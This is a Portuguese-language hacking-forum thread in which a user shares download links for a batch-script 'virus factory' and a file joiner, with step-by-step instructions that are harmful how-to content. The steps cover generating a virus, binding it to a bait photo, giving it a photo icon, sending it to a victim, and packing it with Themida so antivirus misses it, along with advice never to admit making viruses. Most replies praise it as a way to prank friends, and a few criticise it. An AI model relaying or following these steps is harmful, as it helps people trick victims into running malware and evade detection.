Fábrica de Vírus.

Started by mrx, 25 de October , 2008, 07:43:51 PM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

mrx

Informaçoes:
Aqui iremos usar os programas: Cactus Joiner e Fabrica de virus (Cujo download esta no topico)
Use com Moderaçao.

Download:
http://www.sendspace.com/file/fh13pp
ou http://www.2shared.com/file/7662988/d48ce62a/Fabrica_de_Virus__Cactus_Joiner.html

Programas:
•Cactus Joiner
•Fabrica de Virus V1.3

Como Usar: (No exemplo o virus sera o virus 9)

1º Abra o programa Fabrica de Virus, e escolha um virus do seu gosto (Exemplo: Vc ker o virus 9, entao vc aperta o numero 9 e da enter.)
2º Vai pedir um nome para o virus (As vezes ele pede pra dizer a mensagem, ou outra coisa)
3º Ira criar um Arquivo .bat no desktop
4º Tenha um arquivo Limpo que sera a isca (Exemplo: Uma foto)
5º Abra o Cactus Joiner e clique em Añadir Archivo e coloque o Virus e a isca (No caso o virus 9 e a foto)
6º Va em Opciones Generales e escolha a opçao "Con Icono" e abrirá uma janela para escolher um icone (Vem varios Icones na pasta do Cactos Joiner) (No exemplo vamos escolher o Icone de Foto)
7º Clique em Cerrar Opiciones Avanzadas (Ps: Se quiser pod usar o Firewall Killer XP (Eu nunka uso) )
8º Clique em Compilar Joiner e escolha a pasta que ira salvar e o nome do arquivo.
9º Envie para a Vitima o programa criado.

OBS: Nunca abra o Virus que vc fez (Somente os Inofencivos)
OBS²: Nunca Diga que vc faz virus.
OBS³: O Programa cria virus, ou seja todos antivirus vao apontar que ele é um virus... Porem ele é somente um criador de virus =] (Ah no Scan aponta que é virus. Hey Hey, é um programa ke cria virus! Você ker q ele esteja Limpo ¬¬ Ah e todos os virus sao inofencivos xD)
Dica: Use o programa Themida para fazer o virus ficar Indetectavel.

Programa feito por: Thalles Lazaro

Abraços.

Voltando a ativa. ;P

OverClock

ja tinha visto antes...e massa pra quem ta começando...pra zuar os amigos ....hehehe :D

Mt lega...post massa... :)

Fir3FoX

Maneiirisimo aushauhs

Tô fazendo o donwload para da uma olhada..

Vlww aee.. Legal o post

mrx

Todos esses vírus são feitos em Batch

depois vo ver se acho todas as sources para compartilhar e ajudar quem ta estudando batch

Abraços.

Voltando a ativa. ;P

Donnvan

bironet

Esse programinha lembra minha infância rss ohhh época boa..

Stuburn

Vlw aee
Já to fazendo download  ;)

Imoogi

Ja vi esse fabrica de virus é legalzinho, ele é feito em batch script e os virus que ele faz tbm são em batch script...

Redk

é tava por dentro disso inclusive meu blog tem o download dele ;D

Stradivous

Gostei, muito manero.

Downloading...

Stradivous

MRX, dá pra juntar dois arquivos sem ser. bat ?

drb

Sei que o mrx apenas postou isso por pura didatica e para mostrar algo de novo (mas não eh novo^^)...
Quando eu vi no "recentes", achei que tavam ressucitando o tópico.... mas infelismente Não!
É como o OverClock  disse:
Quote from: OverClock on 25 de October , 2008, 09:03:27 PM
e massa pra quem ta começando...pra zuar os amigos ....hehehe :D

Mt lega...post massa... :)
Mas ainda acho que isso é coisa de Lammer Fedido! Que Sempre vai fica dependendo dos outros!!!

Quote from: mrx on 26 de October , 2008, 04:35:10 PM
Todos esses vírus são feitos em Batch

depois vo ver se acho todas as sources para compartilhar e ajudar quem ta estudando batch

Abraços.

È soh para isso que vai servir!!!! Mas pela descrição dos vírus no menu.. não da nem animo para olha o fonte!!
Se este post foi didatico e apenas para mostrar como funciona e que este programa existe.... então  parabéns mrx!

Ice-T

Oi eu fis download mas depois nao conxegui abrir o Cactus pode damr uma ajuda

Juni0rL1nuX

OK, você programou e criou um vírus...

Agora me diga, o que você vai ganhar com isso ? Quer realmente impressionar o pessoal ? Crie um vírus pra Linux, que passe porcima do R00t e da compilação e permição ( ./ , make, make install, chmod... )

Aí sim, bato palma de pé pra você.
Juni0rL1nuX

[]'s

Joey

Quote from: Juni0rL1nuX on 06 de December , 2009, 05:29:48 PM
OK, você programou e criou um vírus...

Agora me diga, o que você vai ganhar com isso ? Quer realmente impressionar o pessoal ? Crie um vírus pra Linux, que passe porcima do R00t e da compilação e permição ( ./ , make, make install, chmod... )

Aí sim, bato palma de pé pra você.
você não sabe nem o que ta falando...
Com um punhado de areia eu mostrarei o terror à vocês.